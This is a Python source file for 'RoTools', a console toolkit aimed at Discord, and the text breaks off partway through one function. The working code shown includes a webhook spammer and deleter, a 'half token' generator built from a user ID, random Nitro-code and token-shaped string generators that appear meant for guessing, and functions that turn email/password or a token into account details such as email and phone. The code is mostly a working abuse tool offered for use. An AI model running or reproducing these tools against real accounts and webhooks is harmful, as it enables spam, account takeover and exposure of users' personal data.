Code/RoTools.py
|
RodrikWan/RoTools
|
bda0c9056b7cbc55118b6be2253787ea44a4a1b3
|
[
"MIT"
] | 1
|
2021-11-24T22:10:48.000Z
|
2021-11-24T22:10:48.000Z
|
Code/RoTools.py
|
RodrikWan/RoTools
|
bda0c9056b7cbc55118b6be2253787ea44a4a1b3
|
[
"MIT"
] | null | null | null |
Code/RoTools.py
|
RodrikWan/RoTools
|
bda0c9056b7cbc55118b6be2253787ea44a4a1b3
|
[
"MIT"
] | null | null | null |
# ═║╔╗╚╝╠╣╩╬
#Colorama
from colorama import *
#Others
import os, requests, random, string, base64
#Credits
def Credits():
    """Display the credits / changelog screen, then return to the main menu."""
    os.system('title RoTools 0.1 - Credits')  # set console window title (Windows-only)
    os.system('cls')  # clear the console (Windows-only)
    print(F"{Fore.CYAN}╔═════════════════════════════════════════════════════════╗")#-------------------|
    print(F"{Fore.CYAN}║{Fore.WHITE}██████╗ █████╗ ████████╗ █████╗ █████╗ ██╗ ██████╗{Fore.CYAN}║")
    print(F"{Fore.CYAN}║{Fore.WHITE}██╔══██╗██╔══██╗╚══██╔══╝██╔══██╗██╔══██╗██║ ██╔════╝{Fore.CYAN}║")
    print(F"{Fore.CYAN}║{Fore.WHITE}██████╔╝██║ ██║ ██║ ██║ ██║██║ ██║██║ ╚█████╗ {Fore.CYAN}║")
    print(F"{Fore.CYAN}║{Fore.WHITE}██╔══██╗██║ ██║ ██║ ██║ ██║██║ ██║██║ ╚═══██╗{Fore.CYAN}║")
    print(F"{Fore.CYAN}║{Fore.WHITE}██║ ██║╚█████╔╝ ██║ ╚█████╔╝╚█████╔╝███████╗██████╔╝{Fore.CYAN}║")
    print(F"{Fore.CYAN}║{Fore.WHITE}╚═╝ ╚═╝ ╚════╝ ╚═╝ ╚════╝ ╚════╝ ╚══════╝╚═════╝ {Fore.CYAN}║")
    print(F"{Fore.CYAN}╠═════════════════════════════════════════════════════════╣")#-------------------|
    print(F"{Fore.CYAN}║{Fore.WHITE} Made by: RodrikWan {Fore.CYAN}║")
    print(F"{Fore.CYAN}║{Fore.WHITE} Version: 0.1.0 {Fore.CYAN}║")
    print(F"{Fore.CYAN}║ ║")#-------------------|
    print(F"{Fore.CYAN}║{Fore.WHITE} Changelog: {Fore.CYAN}║")
    print(F"{Fore.CYAN}║{Fore.WHITE} - Added Main Menu {Fore.CYAN}║")
    print(F"{Fore.CYAN}║{Fore.WHITE} - Added Credits {Fore.CYAN}║")
    print(F"{Fore.CYAN}║{Fore.WHITE} - Added Discord Menu {Fore.CYAN}║")
    print(F"{Fore.CYAN}║{Fore.WHITE} - Added Discord Menu Page 2 {Fore.CYAN}║")
    print(F"{Fore.CYAN}║{Fore.WHITE} - Added Discord Nitro Generator {Fore.CYAN}║")
    print(F"{Fore.CYAN}║{Fore.WHITE} - Added Discord Token Generator {Fore.CYAN}║")
    print(F"{Fore.CYAN}║{Fore.WHITE} - Added Discord Token Info {Fore.CYAN}║")
    print(F"{Fore.CYAN}║{Fore.WHITE} - Added Discord Token from Email/Password {Fore.CYAN}║")
    print(F"{Fore.CYAN}║{Fore.WHITE} - Added Discord Webhook Spammer {Fore.CYAN}║")
    print(F"{Fore.CYAN}║{Fore.WHITE} - Added Discord Webhook Deleter {Fore.CYAN}║")
    print(F"{Fore.CYAN}║{Fore.WHITE} - Added Discord Half token from user ID {Fore.CYAN}║")
    print(F"{Fore.CYAN}║{Fore.WHITE} - Added Discord change Hypesquad House {Fore.CYAN}║")
    print(F"{Fore.CYAN}║{Fore.WHITE} - Added Discord Token Disabler {Fore.CYAN}║")
    print(F"{Fore.CYAN}║{Fore.WHITE} - Added Discord Token Unverifier {Fore.CYAN}║")
    print(F"{Fore.CYAN}║{Fore.WHITE} - Added Windows Menu {Fore.CYAN}║")
    print(F"{Fore.CYAN}║{Fore.WHITE} - Added Windows Power Menu {Fore.CYAN}║")
    print(F"{Fore.CYAN}║{Fore.WHITE} - Added Windows Log Out {Fore.CYAN}║")
    print(F"{Fore.CYAN}║{Fore.WHITE} - Added Windows Hibernate {Fore.CYAN}║")
    print(F"{Fore.CYAN}║{Fore.WHITE} - Added Windows Shutdown {Fore.CYAN}║")
    print(F"{Fore.CYAN}║{Fore.WHITE} - Added Windows Restart {Fore.CYAN}║")
    print(F"{Fore.CYAN}╚═════════════════════════════════════════════════════════╝")#-------------------|
    # Block until the user acknowledges, then re-enter the main menu
    # (MainMenu is defined elsewhere in this file).
    input(f"\n{Fore.CYAN}[INFO] {Fore.WHITE}Press [Enter] to return to Main Menu")
    MainMenu()
#Discord Menu
def DiscordMenu():
    """Render page 1 of the Discord tools menu and dispatch the user's choice."""
    os.system('title RoTools 0.1 - Discord Menu')
    os.system('cls')
    print(F"{Fore.CYAN}╔═════════════════════════════════════════════════════════╗")#-------------------|
    print(F"{Fore.CYAN}║{Fore.WHITE}██████╗ █████╗ ████████╗ █████╗ █████╗ ██╗ ██████╗{Fore.CYAN}║")
    print(F"{Fore.CYAN}║{Fore.WHITE}██╔══██╗██╔══██╗╚══██╔══╝██╔══██╗██╔══██╗██║ ██╔════╝{Fore.CYAN}║")
    print(F"{Fore.CYAN}║{Fore.WHITE}██████╔╝██║ ██║ ██║ ██║ ██║██║ ██║██║ ╚█████╗ {Fore.CYAN}║")
    print(F"{Fore.CYAN}║{Fore.WHITE}██╔══██╗██║ ██║ ██║ ██║ ██║██║ ██║██║ ╚═══██╗{Fore.CYAN}║")
    print(F"{Fore.CYAN}║{Fore.WHITE}██║ ██║╚█████╔╝ ██║ ╚█████╔╝╚█████╔╝███████╗██████╔╝{Fore.CYAN}║")
    print(F"{Fore.CYAN}║{Fore.WHITE}╚═╝ ╚═╝ ╚════╝ ╚═╝ ╚════╝ ╚════╝ ╚══════╝╚═════╝ {Fore.CYAN}║")
    print(F"{Fore.CYAN}╠═════════════════════════════════════════════════════════╣")#-------------------|
    print(f"{Fore.CYAN}║{Fore.WHITE} Discord Menu {Fore.CYAN}║")
    print(f"{Fore.CYAN}║ ║")#-------------------|
    print(f"{Fore.CYAN}║{Fore.WHITE} 1 | Discord Nitro Generator {Fore.CYAN}║")
    print(f"{Fore.CYAN}║{Fore.WHITE} 2 | Discord Token Generator {Fore.CYAN}║")
    print(f"{Fore.CYAN}║{Fore.WHITE} 3 | Discord Token Info {Fore.CYAN}║")
    print(f"{Fore.CYAN}║{Fore.WHITE} 4 | Discord Token from Email/Password {Fore.CYAN}║")
    print(f"{Fore.CYAN}║{Fore.WHITE} 5 | Discord Webhook Spammer {Fore.CYAN}║")
    print(f"{Fore.CYAN}║{Fore.WHITE} 6 | Discord Webhook Deleter {Fore.CYAN}║")
    print(f"{Fore.CYAN}║{Fore.WHITE} 7 | Discord Half token from user ID {Fore.CYAN}║")
    print(f"{Fore.CYAN}║{Fore.WHITE} 8 | Discord change Hypesquad House {Fore.CYAN}║")
    print(f"{Fore.CYAN}║{Fore.WHITE} 9 | Next page {Fore.CYAN}║")
    print(f"{Fore.CYAN}║{Fore.WHITE} 0 | Main Menu {Fore.CYAN}║")
    print(f"{Fore.CYAN}╚═════════════════════════════════════════════════════════╝")#-------------------|
    # Option number -> handler; replaces the long if/elif chain.
    handlers = {
        1: NitroGenerator,
        2: TokenGenerator,
        3: TokenInfo,
        4: TokenFromEmailPass,
        5: WebhookSpammer,
        6: WebhookDeleter,
        7: HalfToken,
        8: ChangeHypesquadHouse,
        9: DiscordMenu2,
        0: MainMenu,
    }
    try:
        # BUG FIX: int() previously raised an uncaught ValueError on
        # non-numeric input; treat that like any other incorrect option.
        DiscordMenuChoice = int(input(f"\n{Fore.CYAN}[INPUT] {Fore.WHITE}Option: "))
        action = handlers[DiscordMenuChoice]
    except (ValueError, KeyError):
        print(f"\n{Fore.RED}[ERROR] {Fore.WHITE}Incorrect option")
        input(f'\n{Fore.WHITE}Press [Enter] to return to Discord Menu')
        DiscordMenu()
    else:
        action()
#Discord Menu2
def DiscordMenu2():
    """Render page 2 of the Discord tools menu and dispatch the user's choice."""
    os.system('title RoTools 0.1 - Discord Menu 2')
    os.system('cls')
    print(F"{Fore.CYAN}╔═════════════════════════════════════════════════════════╗")#-------------------|
    print(F"{Fore.CYAN}║{Fore.WHITE}██████╗ █████╗ ████████╗ █████╗ █████╗ ██╗ ██████╗{Fore.CYAN}║")
    print(F"{Fore.CYAN}║{Fore.WHITE}██╔══██╗██╔══██╗╚══██╔══╝██╔══██╗██╔══██╗██║ ██╔════╝{Fore.CYAN}║")
    print(F"{Fore.CYAN}║{Fore.WHITE}██████╔╝██║ ██║ ██║ ██║ ██║██║ ██║██║ ╚█████╗ {Fore.CYAN}║")
    print(F"{Fore.CYAN}║{Fore.WHITE}██╔══██╗██║ ██║ ██║ ██║ ██║██║ ██║██║ ╚═══██╗{Fore.CYAN}║")
    print(F"{Fore.CYAN}║{Fore.WHITE}██║ ██║╚█████╔╝ ██║ ╚█████╔╝╚█████╔╝███████╗██████╔╝{Fore.CYAN}║")
    print(F"{Fore.CYAN}║{Fore.WHITE}╚═╝ ╚═╝ ╚════╝ ╚═╝ ╚════╝ ╚════╝ ╚══════╝╚═════╝ {Fore.CYAN}║")
    print(F"{Fore.CYAN}╠═════════════════════════════════════════════════════════╣")#-------------------|
    print(f"{Fore.CYAN}║{Fore.WHITE} Discord Menu 2 {Fore.CYAN}║")
    print(f"{Fore.CYAN}║ ║")#-------------------|
    print(f"{Fore.CYAN}║{Fore.WHITE} 1 | Discord Token Disabler {Fore.CYAN}║")
    print(f"{Fore.CYAN}║{Fore.WHITE} 2 | Discord Token Unverifier {Fore.CYAN}║")
    print(f"{Fore.CYAN}║{Fore.WHITE} 8 | Previous page {Fore.CYAN}║")
    print(f"{Fore.CYAN}║{Fore.WHITE} 9 | Next page (Not working) {Fore.CYAN}║")
    print(f"{Fore.CYAN}║{Fore.WHITE} 0 | Main Menu {Fore.CYAN}║")
    print(f"{Fore.CYAN}╚═════════════════════════════════════════════════════════╝")#-------------------|
    # Option number -> handler; replaces the if/elif chain.
    handlers = {
        1: DisableToken,
        2: TokenUnverifier,
        8: DiscordMenu,
        9: DiscordMenu2,
        0: MainMenu,
    }
    try:
        # BUG FIX: int() previously raised an uncaught ValueError on
        # non-numeric input; treat that like any other incorrect option.
        DiscordMenuChoice = int(input(f"\n{Fore.CYAN}[INPUT] {Fore.WHITE}Option: "))
        action = handlers[DiscordMenuChoice]
    except (ValueError, KeyError):
        print(f"\n{Fore.RED}[ERROR] {Fore.WHITE}Incorrect option")
        # NOTE: as in the original, the error path returns to menu page 1.
        input(f'\n{Fore.WHITE}Press [Enter] to return to Discord Menu')
        DiscordMenu()
    else:
        action()
#Discord Menu > Nitro Generator
def NitroGenerator():
    """Print N random discord.gift-style codes (random, NOT valid gift links)."""
    os.system('title RoTools 0.1 - Discord Nitro Generator')
    os.system('cls')
    print(F"{Fore.CYAN}╔═════════════════════════════════════════════════════════╗")#-------------------|
    print(F"{Fore.CYAN}║{Fore.WHITE}██████╗ █████╗ ████████╗ █████╗ █████╗ ██╗ ██████╗{Fore.CYAN}║")
    print(F"{Fore.CYAN}║{Fore.WHITE}██╔══██╗██╔══██╗╚══██╔══╝██╔══██╗██╔══██╗██║ ██╔════╝{Fore.CYAN}║")
    print(F"{Fore.CYAN}║{Fore.WHITE}██████╔╝██║ ██║ ██║ ██║ ██║██║ ██║██║ ╚█████╗ {Fore.CYAN}║")
    print(F"{Fore.CYAN}║{Fore.WHITE}██╔══██╗██║ ██║ ██║ ██║ ██║██║ ██║██║ ╚═══██╗{Fore.CYAN}║")
    print(F"{Fore.CYAN}║{Fore.WHITE}██║ ██║╚█████╔╝ ██║ ╚█████╔╝╚█████╔╝███████╗██████╔╝{Fore.CYAN}║")
    print(F"{Fore.CYAN}║{Fore.WHITE}╚═╝ ╚═╝ ╚════╝ ╚═╝ ╚════╝ ╚════╝ ╚══════╝╚═════╝ {Fore.CYAN}║")
    print(F"{Fore.CYAN}╠═════════════════════════════════════════════════════════╣")#-------------------|
    print(F"{Fore.CYAN}║{Fore.WHITE} Discord Nitro Generator {Fore.CYAN}║")
    print(F"{Fore.CYAN}╚═════════════════════════════════════════════════════════╝")#-------------------|
    try:
        NitroGeneratorAmount = int(input(f'\n{Fore.CYAN}[INPUT] {Fore.WHITE}Amount: '))
        print()
        # for-loop instead of the manual while-counter; same iteration count.
        for _ in range(NitroGeneratorAmount):
            # 16 random alphanumerics appended to the gift-link prefix.
            code = "https://discord.gift/" + ''.join(random.choices(string.ascii_letters + string.digits, k=16))
            print(code)
        print(f"\n{Fore.CYAN}[INFO] {Fore.WHITE}Generated {NitroGeneratorAmount} codes")
        input(f"\n{Fore.WHITE}Press [Enter] to return to Discord Menu")
        DiscordMenu()
    except ValueError:
        # Non-numeric amount entered.
        print(f"\n{Fore.RED}[ERROR] {Fore.WHITE}Invalid amount")
        input(f"\n{Fore.WHITE}Press [Enter] to return to Discord Menu")
        DiscordMenu()
#Discord Menu > Token Generator
def TokenGenerator():
    """Print N random token-shaped strings ("Nz" + 59 alphanumerics; not real tokens)."""
    os.system('title RoTools 0.1 - Discord Token Generator')
    os.system('cls')
    print(F"{Fore.CYAN}╔═════════════════════════════════════════════════════════╗")#-------------------|
    print(F"{Fore.CYAN}║{Fore.WHITE}██████╗ █████╗ ████████╗ █████╗ █████╗ ██╗ ██████╗{Fore.CYAN}║")
    print(F"{Fore.CYAN}║{Fore.WHITE}██╔══██╗██╔══██╗╚══██╔══╝██╔══██╗██╔══██╗██║ ██╔════╝{Fore.CYAN}║")
    print(F"{Fore.CYAN}║{Fore.WHITE}██████╔╝██║ ██║ ██║ ██║ ██║██║ ██║██║ ╚█████╗ {Fore.CYAN}║")
    print(F"{Fore.CYAN}║{Fore.WHITE}██╔══██╗██║ ██║ ██║ ██║ ██║██║ ██║██║ ╚═══██╗{Fore.CYAN}║")
    print(F"{Fore.CYAN}║{Fore.WHITE}██║ ██║╚█████╔╝ ██║ ╚█████╔╝╚█████╔╝███████╗██████╔╝{Fore.CYAN}║")
    print(F"{Fore.CYAN}║{Fore.WHITE}╚═╝ ╚═╝ ╚════╝ ╚═╝ ╚════╝ ╚════╝ ╚══════╝╚═════╝ {Fore.CYAN}║")
    print(F"{Fore.CYAN}╠═════════════════════════════════════════════════════════╣")#-------------------|
    print(F"{Fore.CYAN}║{Fore.WHITE} Discord Token Generator {Fore.CYAN}║")
    print(F"{Fore.CYAN}╚═════════════════════════════════════════════════════════╝")#-------------------|
    try:
        TokenGeneratorAmount = int(input(f'\n{Fore.CYAN}[INPUT] {Fore.WHITE}Amount: '))
        print()
        # for-loop instead of the manual while-counter; same iteration count.
        for _ in range(TokenGeneratorAmount):
            code = "Nz" + ''.join(random.choices(string.ascii_letters + string.digits, k=59))
            print(code)
        print(f"\n{Fore.CYAN}[INFO] {Fore.WHITE}Generated {TokenGeneratorAmount} tokens")
        input(f'\n{Fore.WHITE}Press [Enter] to return to Discord Menu')
        DiscordMenu()
    except ValueError:
        # Non-numeric amount entered.
        print(f"\n{Fore.RED}[ERROR] {Fore.WHITE}Invalid amount")
        input(f'\n{Fore.WHITE}Press [Enter] to return to Discord Menu')
        DiscordMenu()
#Discord Menu > Token Info
def TokenInfo():
    """Query /users/@me with a user-supplied token and print account details."""
    os.system('title RoTools 0.1 - Discord Token Info')
    os.system('cls')
    print(F"{Fore.CYAN}╔═════════════════════════════════════════════════════════╗")#-------------------|
    print(F"{Fore.CYAN}║{Fore.WHITE}██████╗ █████╗ ████████╗ █████╗ █████╗ ██╗ ██████╗{Fore.CYAN}║")
    print(F"{Fore.CYAN}║{Fore.WHITE}██╔══██╗██╔══██╗╚══██╔══╝██╔══██╗██╔══██╗██║ ██╔════╝{Fore.CYAN}║")
    print(F"{Fore.CYAN}║{Fore.WHITE}██████╔╝██║ ██║ ██║ ██║ ██║██║ ██║██║ ╚█████╗ {Fore.CYAN}║")
    print(F"{Fore.CYAN}║{Fore.WHITE}██╔══██╗██║ ██║ ██║ ██║ ██║██║ ██║██║ ╚═══██╗{Fore.CYAN}║")
    print(F"{Fore.CYAN}║{Fore.WHITE}██║ ██║╚█████╔╝ ██║ ╚█████╔╝╚█████╔╝███████╗██████╔╝{Fore.CYAN}║")
    print(F"{Fore.CYAN}║{Fore.WHITE}╚═╝ ╚═╝ ╚════╝ ╚═╝ ╚════╝ ╚════╝ ╚══════╝╚═════╝ {Fore.CYAN}║")
    print(F"{Fore.CYAN}╠═════════════════════════════════════════════════════════╣")#-------------------|
    print(F"{Fore.CYAN}║{Fore.WHITE} Discord Token Info {Fore.CYAN}║")
    print(F"{Fore.CYAN}╚═════════════════════════════════════════════════════════╝")#-------------------|
    TokenInfoToken = input(f'\n{Fore.CYAN}[INPUT] {Fore.WHITE}Token: ')
    headers = {'Authorization': TokenInfoToken, 'Content-Type': 'application/json'}
    r = requests.get('https://discord.com/api/v8/users/@me', headers=headers)
    if r.status_code == 200:
        # Parse the JSON body once (it was previously re-parsed six times).
        profile = r.json()
        userName = profile['username'] + '#' + profile['discriminator']
        userID = profile['id']
        phone = profile['phone']
        email = profile['email']
        mfa = profile['mfa_enabled']
        verified = profile['verified']
        print(f"\n{Fore.CYAN}[INFO] {Fore.WHITE}User: {userName}")
        print(f"{Fore.CYAN}[INFO] {Fore.WHITE}ID: {userID}")
        print(f"{Fore.CYAN}[INFO] {Fore.WHITE}Phone: {phone}")
        print(f"{Fore.CYAN}[INFO] {Fore.WHITE}Email: {email}")
        print(f"{Fore.CYAN}[INFO] {Fore.WHITE}MFA: {mfa}")
        print(f"{Fore.CYAN}[INFO] {Fore.WHITE}Verified: {verified}")
        print(f"{Fore.CYAN}[INFO] {Fore.WHITE}Token: {TokenInfoToken}")
        print(f"\n{Fore.CYAN}[INFO] {Fore.WHITE}Info generated")
        input(f'\n{Fore.WHITE}Press [Enter] to return to Discord Menu')
        DiscordMenu()
    else:
        # Any non-200 status is reported as an invalid token.
        print(f"\n{Fore.RED}[ERROR] {Fore.WHITE}Invalid Token")
        input(f'\n{Fore.WHITE}Press [Enter] to return to Discord Menu')
        DiscordMenu()
#Discord Menu > Token from Email/Password
def TokenFromEmailPass():
    """Attempt a Discord login with email/password and print the returned token."""
    os.system('title RoTools 0.1 - Discord Token from Email/Password')
    os.system('cls')
    print(F"{Fore.CYAN}╔═════════════════════════════════════════════════════════╗")#-------------------|
    print(F"{Fore.CYAN}║{Fore.WHITE}██████╗ █████╗ ████████╗ █████╗ █████╗ ██╗ ██████╗{Fore.CYAN}║")
    print(F"{Fore.CYAN}║{Fore.WHITE}██╔══██╗██╔══██╗╚══██╔══╝██╔══██╗██╔══██╗██║ ██╔════╝{Fore.CYAN}║")
    print(F"{Fore.CYAN}║{Fore.WHITE}██████╔╝██║ ██║ ██║ ██║ ██║██║ ██║██║ ╚█████╗ {Fore.CYAN}║")
    print(F"{Fore.CYAN}║{Fore.WHITE}██╔══██╗██║ ██║ ██║ ██║ ██║██║ ██║██║ ╚═══██╗{Fore.CYAN}║")
    print(F"{Fore.CYAN}║{Fore.WHITE}██║ ██║╚█████╔╝ ██║ ╚█████╔╝╚█████╔╝███████╗██████╔╝{Fore.CYAN}║")
    print(F"{Fore.CYAN}║{Fore.WHITE}╚═╝ ╚═╝ ╚════╝ ╚═╝ ╚════╝ ╚════╝ ╚══════╝╚═════╝ {Fore.CYAN}║")
    print(F"{Fore.CYAN}╠═════════════════════════════════════════════════════════╣")#-------------------|
    print(F"{Fore.CYAN}║{Fore.WHITE} Discord Token from Email/Password {Fore.CYAN}║")
    print(F"{Fore.CYAN}╚═════════════════════════════════════════════════════════╝")#-------------------|
    TokenFromEmail = input(f'\n{Fore.CYAN}[INPUT] {Fore.WHITE}Email: ')
    TokenFromPassword = input(f'\n{Fore.CYAN}[INPUT] {Fore.WHITE}Password: ')
    # NOTE: 'undelete' is sent as the string "false", as the API call was
    # originally written — presumably what the endpoint expects; not changed.
    data = {'email': TokenFromEmail, 'password': TokenFromPassword, 'undelete': "false"}
    headers = {'content-type': "application/json", 'user-agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36"}
    r = requests.post('https://discord.com/api/v8/auth/login', json=data, headers=headers)
    if r.status_code == 200:
        token = r.json()['token']
        print(f'\n{Fore.WHITE}TOKEN: {token}')
        print(f"\n{Fore.CYAN}[INFO] {Fore.WHITE}Token generated")
        input(f'\n{Fore.WHITE}Press [Enter] to return to Discord Menu')
        DiscordMenu()
        # BUG FIX: removed the dead `os.system('cls; clear')` that followed the
        # menu call — it was unreachable in practice and not a valid cmd.exe
        # command anyway.
    elif "PASSWORD_DOES_NOT_MATCH" in r.text:
        print(f"\n{Fore.RED}[ERROR] {Fore.WHITE}Invalid password")
        input(f'\n{Fore.WHITE}Press [Enter] to return to Discord Menu')
        DiscordMenu()
    elif "captcha-required" in r.text:
        # Discord answered with a captcha challenge; cannot proceed headlessly.
        print(f"\n{Fore.YELLOW}[WARN] {Fore.WHITE}Returned captcha")
        input(f'\n{Fore.WHITE}Press [Enter] to return to Discord Menu')
        DiscordMenu()
    else:
        print(f"\n{Fore.RED}[ERROR] {Fore.WHITE}Invalid email or password")
        input(f'\n{Fore.WHITE}Press [Enter] to return to Discord Menu')
        DiscordMenu()
#Discord Menu > WebHook Spammer
def WebhookSpammer():
    """Prompt for a webhook URL, message and count, then POST the message repeatedly."""
    os.system('title RoTools 0.1 - Discord Webhook Spammer')
    os.system('cls')
    print(F"{Fore.CYAN}╔═════════════════════════════════════════════════════════╗")#-------------------|
    print(F"{Fore.CYAN}║{Fore.WHITE}██████╗ █████╗ ████████╗ █████╗ █████╗ ██╗ ██████╗{Fore.CYAN}║")
    print(F"{Fore.CYAN}║{Fore.WHITE}██╔══██╗██╔══██╗╚══██╔══╝██╔══██╗██╔══██╗██║ ██╔════╝{Fore.CYAN}║")
    print(F"{Fore.CYAN}║{Fore.WHITE}██████╔╝██║ ██║ ██║ ██║ ██║██║ ██║██║ ╚█████╗ {Fore.CYAN}║")
    print(F"{Fore.CYAN}║{Fore.WHITE}██╔══██╗██║ ██║ ██║ ██║ ██║██║ ██║██║ ╚═══██╗{Fore.CYAN}║")
    print(F"{Fore.CYAN}║{Fore.WHITE}██║ ██║╚█████╔╝ ██║ ╚█████╔╝╚█████╔╝███████╗██████╔╝{Fore.CYAN}║")
    print(F"{Fore.CYAN}║{Fore.WHITE}╚═╝ ╚═╝ ╚════╝ ╚═╝ ╚════╝ ╚════╝ ╚══════╝╚═════╝ {Fore.CYAN}║")
    print(F"{Fore.CYAN}╠═════════════════════════════════════════════════════════╣")#-------------------|
    print(F"{Fore.CYAN}║{Fore.WHITE} Discord Webhook Spammer {Fore.CYAN}║")
    print(F"{Fore.CYAN}╚═════════════════════════════════════════════════════════╝")#-------------------|
    try:
        WebhookSpammerWebhook = input(f"\n{Fore.CYAN}[INPUT] {Fore.WHITE}Webhook: ")
        WebhookSpammerMessage = input(f"{Fore.CYAN}[INPUT] {Fore.WHITE}Message: ")
        WebhookSpammerAmount = int(input(f"{Fore.CYAN}[INPUT] {Fore.WHITE}Amount: "))
        print()
        for i in range(WebhookSpammerAmount):
            _data = requests.post(WebhookSpammerWebhook, json={'content': WebhookSpammerMessage}, headers={'Content-Type': 'application/json'})
            if _data.status_code < 400:
                print(f'{Fore.GREEN}[SUCCESS] {Fore.WHITE}Sent a message')
    except Exception:
        # FIX: was a bare ``except:`` that also swallowed KeyboardInterrupt /
        # SystemExit and hid any error raised after the spam loop finished.
        print(f"\n{Fore.RED}[ERROR] {Fore.WHITE}Couldn't spam Webhook")
        input(f"\n{Fore.WHITE}Press [Enter] to return to Discord Menu")
        DiscordMenu()
    else:
        # Success summary moved out of the try so menu-recursion errors are
        # no longer reported as a spam failure.
        print(f'\n{Fore.CYAN}[INFO] {Fore.WHITE}Sent {WebhookSpammerAmount} messages')
        input(f"\n{Fore.WHITE}Press [Enter] to return to Discord Menu")
        DiscordMenu()
#Discord Menu > Webhook Deleter
def WebhookDeleter():
    """Prompt for a webhook URL and send an HTTP DELETE to remove it."""
    os.system('title RoTools 0.1 - Discord Webhook Deleter')
    os.system('cls')
    print(F"{Fore.CYAN}╔═════════════════════════════════════════════════════════╗")#-------------------|
    print(F"{Fore.CYAN}║{Fore.WHITE}██████╗ █████╗ ████████╗ █████╗ █████╗ ██╗ ██████╗{Fore.CYAN}║")
    print(F"{Fore.CYAN}║{Fore.WHITE}██╔══██╗██╔══██╗╚══██╔══╝██╔══██╗██╔══██╗██║ ██╔════╝{Fore.CYAN}║")
    print(F"{Fore.CYAN}║{Fore.WHITE}██████╔╝██║ ██║ ██║ ██║ ██║██║ ██║██║ ╚█████╗ {Fore.CYAN}║")
    print(F"{Fore.CYAN}║{Fore.WHITE}██╔══██╗██║ ██║ ██║ ██║ ██║██║ ██║██║ ╚═══██╗{Fore.CYAN}║")
    print(F"{Fore.CYAN}║{Fore.WHITE}██║ ██║╚█████╔╝ ██║ ╚█████╔╝╚█████╔╝███████╗██████╔╝{Fore.CYAN}║")
    print(F"{Fore.CYAN}║{Fore.WHITE}╚═╝ ╚═╝ ╚════╝ ╚═╝ ╚════╝ ╚════╝ ╚══════╝╚═════╝ {Fore.CYAN}║")
    print(F"{Fore.CYAN}╠═════════════════════════════════════════════════════════╣")#-------------------|
    print(F"{Fore.CYAN}║{Fore.WHITE} Discord Webhook Deleter {Fore.CYAN}║")
    print(F"{Fore.CYAN}╚═════════════════════════════════════════════════════════╝")#-------------------|
    try:
        WebhookDeleterWebhook = input(f"\n{Fore.CYAN}[INPUT] {Fore.WHITE}Webhook: ")
        # rstrip() drops a trailing newline/space from a pasted URL.
        requests.delete(WebhookDeleterWebhook.rstrip())
    except Exception:
        # FIX: was a bare ``except:`` that also swallowed KeyboardInterrupt /
        # SystemExit and hid errors from the menu recursion below.
        print(f"\n{Fore.RED}[ERROR] {Fore.WHITE}Couldn't delete Webhook")
        input(f"\n{Fore.WHITE}Press [Enter] to return to Discord Menu")
        DiscordMenu()
    else:
        print(f'\n{Fore.CYAN}[INFO] {Fore.WHITE}Webhook deleted')
        input(f"\n{Fore.WHITE}Press [Enter] to return to Discord Menu")
        DiscordMenu()
#Discord Menu > HalfToken
def HalfToken():
    """Base64-encode a user ID, producing the leading "half token" segment."""
    os.system('title RoTools 0.1 - Discord Half Token from user ID')
    os.system('cls')
    print(F"{Fore.CYAN}╔═════════════════════════════════════════════════════════╗")#-------------------|
    print(F"{Fore.CYAN}║{Fore.WHITE}██████╗ █████╗ ████████╗ █████╗ █████╗ ██╗ ██████╗{Fore.CYAN}║")
    print(F"{Fore.CYAN}║{Fore.WHITE}██╔══██╗██╔══██╗╚══██╔══╝██╔══██╗██╔══██╗██║ ██╔════╝{Fore.CYAN}║")
    print(F"{Fore.CYAN}║{Fore.WHITE}██████╔╝██║ ██║ ██║ ██║ ██║██║ ██║██║ ╚█████╗ {Fore.CYAN}║")
    print(F"{Fore.CYAN}║{Fore.WHITE}██╔══██╗██║ ██║ ██║ ██║ ██║██║ ██║██║ ╚═══██╗{Fore.CYAN}║")
    print(F"{Fore.CYAN}║{Fore.WHITE}██║ ██║╚█████╔╝ ██║ ╚█████╔╝╚█████╔╝███████╗██████╔╝{Fore.CYAN}║")
    print(F"{Fore.CYAN}║{Fore.WHITE}╚═╝ ╚═╝ ╚════╝ ╚═╝ ╚════╝ ╚════╝ ╚══════╝╚═════╝ {Fore.CYAN}║")
    print(F"{Fore.CYAN}╠═════════════════════════════════════════════════════════╣")#-------------------|
    print(F"{Fore.CYAN}║{Fore.WHITE} Discord Half token from user ID {Fore.CYAN}║")
    print(F"{Fore.CYAN}╚═════════════════════════════════════════════════════════╝")#-------------------|
    userid = input(f'\n{Fore.CYAN}[INPUT] {Fore.WHITE}UserID: ')
    # input() already returns str, so the original f"{userid}" copy was a
    # no-op, and the non-standard 'utf' codec alias is spelled out as 'utf-8'.
    HalfTokenGen = base64.b64encode(userid.encode('utf-8')).decode('utf-8')
    print(f'\n{Fore.WHITE}Half Token: {HalfTokenGen}')
    print(f'\n{Fore.CYAN}[INFO] {Fore.WHITE}Half token generated')
    input(f"\n{Fore.WHITE}Press [Enter] to return to Discord Menu")
    DiscordMenu()
#Discord Menu > Change Hypesquad House
def ChangeHypesquadHouse():
    """Change a token's Hypesquad house via the hypesquad/online endpoint."""
    os.system('title RoTools 0.1 - Discord change Hypesquad House')
    os.system('cls')
    print(F"{Fore.CYAN}╔═════════════════════════════════════════════════════════╗")#-------------------|
    print(F"{Fore.CYAN}║{Fore.WHITE}██████╗ █████╗ ████████╗ █████╗ █████╗ ██╗ ██████╗{Fore.CYAN}║")
    print(F"{Fore.CYAN}║{Fore.WHITE}██╔══██╗██╔══██╗╚══██╔══╝██╔══██╗██╔══██╗██║ ██╔════╝{Fore.CYAN}║")
    print(F"{Fore.CYAN}║{Fore.WHITE}██████╔╝██║ ██║ ██║ ██║ ██║██║ ██║██║ ╚█████╗ {Fore.CYAN}║")
    print(F"{Fore.CYAN}║{Fore.WHITE}██╔══██╗██║ ██║ ██║ ██║ ██║██║ ██║██║ ╚═══██╗{Fore.CYAN}║")
    print(F"{Fore.CYAN}║{Fore.WHITE}██║ ██║╚█████╔╝ ██║ ╚█████╔╝╚█████╔╝███████╗██████╔╝{Fore.CYAN}║")
    print(F"{Fore.CYAN}║{Fore.WHITE}╚═╝ ╚═╝ ╚════╝ ╚═╝ ╚════╝ ╚════╝ ╚══════╝╚═════╝ {Fore.CYAN}║")
    print(F"{Fore.CYAN}╠═════════════════════════════════════════════════════════╣")#-------------------|
    print(F"{Fore.CYAN}║{Fore.WHITE} Discord change Hypesquad House {Fore.CYAN}║")
